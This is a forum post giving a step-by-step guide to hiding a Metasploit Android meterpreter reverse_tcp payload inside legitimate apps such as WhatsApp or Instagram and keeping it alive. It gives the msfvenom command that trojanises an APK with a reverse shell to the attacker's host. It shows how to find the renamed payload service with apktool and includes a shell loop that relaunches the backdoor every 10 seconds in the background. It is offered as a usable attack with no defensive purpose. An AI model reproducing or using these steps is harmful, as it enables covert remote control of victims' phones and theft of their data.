Forum Thread: Android Persistent Backdoor Script for Payload Embedded in an Original Apk Using Msfvenom

The persistent backdoor script .sh for the android/meterpreter/reverse_tcp non embedded apk payload was created and run by this post.

But the problem with this script is that you cannot use it on the payload which is embedded in the original apk file like Whatsapp or Instagram with: msfvenom -x original.apk -p android/meterpreter/reverse_tcp lhost=your_local_ip lport=1234 -o original_embedded.apk

In this post I will explain how to create a persistent backdoor script in this case.

The video explaining the same is uploaded on Youtube along with the link to a small software which I created which automates the whole script generation process. I made this software as I was getting tired of manually creating the scripts again and again, it is because each time the script is a little bit unique for each time the payload is created and not always the same as the do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity for default payload.

Method 1: Browse and Add apktool.jar and the embed_original.Apk PATH in Software.

The first method is automatic where the software will do all the work for you.
Download software from Github.
Download apktool.

After downloading the from the link, run the script in the terminal as: python

Add the correct paths for apktool.jar and generated embedded_original.apk and click Generate Script.

That's it. It may take some time depending on the size of the apk file. The script will be saved as in the same folder where the python code is located.

Run the script in meterpreter as shown in this post.

Please Note:- If you generate the in Windows platform instead of Kali then create a new file in Kali and copy & paste the script code in the newly created file. What I had experienced was that any script file created in Windows did not work in Kali msfconsole: exploit/multi/handler. Anyways if you are already using Kali then it is recommended to use this script generator software on Kali too to avoid confusion.

For doing it manually follow method 2 below

Method 2: Follow the Following Steps

The steps to follow after the embed_original .apk creation.

Step 1: Download and Install Apktool

Download and install Apktool by following the steps from this link.
Copy both apktool.jar & apktool in /usr/local/bin folder to use it in terminal.

Step 2: Decompile the embed_original.Apk Using Apktool

The command for decompiling the the apk is: apktool d -f embed_original.apk
This will create an embed_original folder.

Step 3: Open the AndroidManifest.Xml File

The embed_original folder will contain AndroidManifest.xml, open the file and traverse to the last part of the manifest file.

What we need is the last service as the reference for the script which looks like: <service android:exported="true" android:name="com.example.myapplication.apdie.Fiels"/>

This path: com.example.myapplication.apdie.Fiels will be used in the script to run the service. This path is usually com.metasploit.stage.MainActivity in the metasploit non-embed apk file.

But when the embed_original.apk is created, the files of the metasploit payload is moved in the original.apk with random file names such as "apdie.Fiels" in com.example.myapplication.apdie.Fiels which is basically "stage.Payload" in com.metasploit.stage.Payload to avoid conflicts with the names of the original apk files while running the application.

Step 4: Use That Path for the Script

Use com.example.myapplication.apdie.Fiels as com.example.myapplication/.apdie.Fiels in
while :
do am startservice --user 0 com.example.myapplication/.apdie.Fiels
sleep 10

This will run the payload in the background at 10 second interval without opening the main application.

Remember that the apdie.Fiels will change every time when the payload is created so you have to repeat all the steps again if the embed_original.apk is generated again.

Follow the steps here to run the script.

Become an Android Expert

Daily tips & tricks from Gadget Hacks.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active